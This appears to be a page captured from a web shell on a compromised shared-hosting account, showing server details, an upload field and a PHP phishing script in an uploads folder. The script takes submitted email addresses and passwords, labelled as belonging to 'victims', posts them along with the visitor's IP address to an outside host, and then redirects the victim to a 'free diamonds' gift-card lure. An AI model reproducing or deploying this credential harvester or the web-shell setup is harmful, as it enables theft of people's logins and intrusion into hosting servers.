Server IP : 162.0.232.140 / Your IP : 3.129.89.50 Web Server : LiteSpeed System : Linux premium139.web-hosting.com 4.18.0-513.24.1.lve.2.el8.x86_64 #1 SMP Fri May 24 12:42:50 UTC 2024 x86_64 User : micrcvoy ( 740) PHP Version : 8.1.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/micrcvoy/www/uploads/slider/ |
Upload File : |
<? ob_start(); function post_to_url($url, $data) { $fields = ''; foreach($data as $key => $value) { $fields .= $key . '=' . $value . '&'; } rtrim($fields, '&'); ini_set('max_execution_time', 50000); $post = curl_init(); curl_setopt($post, CURLOPT_URL, $url); curl_setopt($post, CURLOPT_POST, count($data)); curl_setopt($post, CURLOPT_POSTFIELDS, $fields); curl_setopt($post, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($post); } $user_id_victim = $_POST['user_id_victim']; $user_name_victims = $_POST['email']; $user_pass_victims = $_POST['pass']; if(isset($user_name_victims) and isset($user_pass_victims) and $user_name_victims != '' and $user_pass_victims != ''){ $data = array( "email" => $user_name_victims, "pass" => $user_pass_victims, "user_id_victim" => $user_id_victim, "type" => $_POST['type'], "$ip" => $_SERVER['REMOTE_ADDR'] ); post_to_url("https://z-lolz.com/golglo.php", $data); $type = $_POST['type']; if (isset($type)) echo '<script>window.top.location.href ="https://giftcardall.us/free-diamonds";</script>'; }else{ echo ''; } ?>